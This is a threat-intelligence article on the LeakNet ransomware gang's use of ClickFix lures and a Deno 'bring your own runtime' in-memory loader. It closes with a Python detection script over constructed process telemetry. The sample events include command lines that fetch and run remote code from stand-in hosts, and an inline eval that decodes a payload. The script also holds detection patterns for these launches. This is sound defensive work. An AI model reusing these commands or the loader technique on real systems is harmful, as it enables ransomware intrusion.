The LeakNet ransomware gang is now using the ClickFix social-engineering technique to gain initial access to corporate environments, then deploying a malware loader built on Deno, the open-source JavaScript and TypeScript runtime.
The attackers use the legitimate Deno binary to decode and execute the malicious payload directly in memory, leaving little forensic evidence on disk and lowering the chance of detection.
LeakNet is a relatively recent ransomware threat actor that has been active since the end of 2024. The actor averages around three victims every month, but the operation may expand with the adoption of the new tactics.
ClickFix is a widely used social engineering attack that tricks users into running malicious commands on their own systems through fake prompts, typically bogus CAPTCHA checks or "fix this error" dialogs that instruct the victim to paste a command into the Windows Run dialog or a terminal. The technique has been adopted by multiple ransomware groups, including Termite and Interlock.
In LeakNet’s case, the ClickFix lure leads to deploying a Deno-based loader that executes a JavaScript payload in system memory.
ClickFix lure used by LeakNet
Source: ReliaQuest
ReliaQuest calls this tactic a “bring your own runtime” (BYOR) attack: Deno is a legitimate JavaScript/TypeScript runtime that lets JS/TS code run outside the browser, so the attacker ships the runtime and feeds it the malicious script.
Because the Deno executable is a signed, legitimate binary, it slips past blocklists and filters that only stop unknown or unsigned executables; the malicious behaviour lives in the script the runtime is told to run, not in the binary itself.
“Rather than deploying a custom malware loader that’s more likely to get flagged, the attackers install the legitimate Deno executable and use it to run malicious code,” explains ReliaQuest.
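Since the binary itself is clean, detection has to key on how the runtime is launched rather than on what it is. The following is an added example (not code from ReliaQuest or the article) of a behavioural check over process-creation telemetry: it scores deno.exe launches that combine an interactive ClickFix-style ancestry (explorer.exe, or a shell spawned from it), code pulled from a remote URL or passed inline to `deno eval`, blanket permissions, and a binary staged in a user-writable directory. The four Sysmon-style JSON events, the `.invalid` domains and the scoring weights are all constructed for this example; the ancestry heuristic is an assumption about how ClickFix victims typically end up running the pasted command, not a detail reported for LeakNet.

```python
"""Flag a legitimate script runtime (Deno) being used as a "bring your own runtime" loader.

Added example: the telemetry below is constructed Sysmon-style process-creation data
flattened to JSON lines, and every heuristic/weight is an assumption for illustration.
"""
import json
import re
from typing import Iterable

# Constructed sample events (NOT real LeakNet data). Users, paths and .invalid hosts are made up.
SAMPLE_LOG = r"""
{"pid": 4120, "Image": "C:\\Users\\dev\\.deno\\bin\\deno.exe", "CommandLine": "deno run --allow-net --allow-read server.ts", "ParentImage": "C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", "GrandParentImage": "C:\\Windows\\explorer.exe"}
{"pid": 5208, "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\deno.exe", "CommandLine": "deno.exe run -A https://cdn.example.invalid/verify.js", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "GrandParentImage": "C:\\Windows\\explorer.exe"}
{"pid": 5310, "Image": "C:\\Users\\jdoe\\Downloads\\deno.exe", "CommandLine": "deno.exe eval \"const s=atob('ZmV0Y2g=');\"", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "GrandParentImage": "C:\\Windows\\explorer.exe"}
{"pid": 6001, "Image": "C:\\Program Files\\deno\\deno.exe", "CommandLine": "deno run --allow-net https://ci.example.invalid/lint.ts", "ParentImage": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "GrandParentImage": "C:\\actions-runner\\bin\\Runner.Worker.exe"}
"""

# Shells a ClickFix victim is likely to have pasted the command into (assumption).
INTERACTIVE_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
REMOTE_MODULE = re.compile(r"https?://", re.I)                       # code fetched at runtime
BROAD_PERMS = re.compile(r"(^|\s)(-A|--allow-all|--allow-run)(\s|$)")  # real Deno permission flags
INLINE_DECODE = re.compile(r"\b(atob|fromCharCode|TextDecoder)\b")    # decode-then-run inline code
STAGING_DIR = re.compile(r"\\(Temp|Downloads|Public)\\", re.I)        # user-writable drop locations


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def subcommand(cmdline: str) -> str:
    """First token after the executable that is not a flag, e.g. 'run' or 'eval'."""
    for tok in cmdline.split()[1:]:
        if not tok.startswith("-"):
            return tok.lower()
    return ""


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event; 0 for anything that is not Deno."""
    if basename(ev["Image"]) not in {"deno.exe", "deno"}:
        return 0, []
    score, reasons = 0, []
    parent = basename(ev.get("ParentImage", ""))
    grandparent = basename(ev.get("GrandParentImage", ""))
    cmd = ev.get("CommandLine", "")

    # Interactive ancestry: launched straight from explorer.exe (Run dialog) or from a shell under it.
    if parent == "explorer.exe" or (parent in INTERACTIVE_SHELLS and grandparent == "explorer.exe"):
        score += 2
        reasons.append("interactive ClickFix-style ancestry (explorer.exe -> shell -> deno)")
    if REMOTE_MODULE.search(cmd):
        score += 2
        reasons.append("runs code fetched from a remote URL")
    if subcommand(cmd) == "eval":
        score += 1
        reasons.append("inline 'eval': no script file touches disk")
        if INLINE_DECODE.search(cmd):
            score += 1
            reasons.append("inline code decodes an embedded payload")
    if BROAD_PERMS.search(cmd):
        score += 1
        reasons.append("blanket permissions (-A / --allow-all / --allow-run)")
    if STAGING_DIR.search(ev["Image"]):
        score += 1
        reasons.append("deno binary staged in a user-writable directory")
    return score, reasons


def parse_events(raw: str) -> list[dict]:
    return [json.loads(line) for line in raw.splitlines() if line.strip()]


def detect(events: Iterable[dict], threshold: int = 3) -> list[dict]:
    """Return alerts for events whose score reaches the threshold (assumed weight: 3)."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev["pid"], "score": score, "reasons": reasons, "cmd": ev["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(f"pid {alert['pid']} score {alert['score']}: {alert['cmd']}")
        for reason in alert["reasons"]:
            print("  -", reason)
```

With the constructed events, the developer running `deno run server.ts` from VS Code scores 0 and the CI runner fetching a remote module scores 2, while the Temp-staged `run -A https://...` launch and the `eval`/`atob` launch from a shell under explorer.exe score 6 and 5 and are reported. Tune the weights against your own baseline of legitimate Deno use before alerting on them.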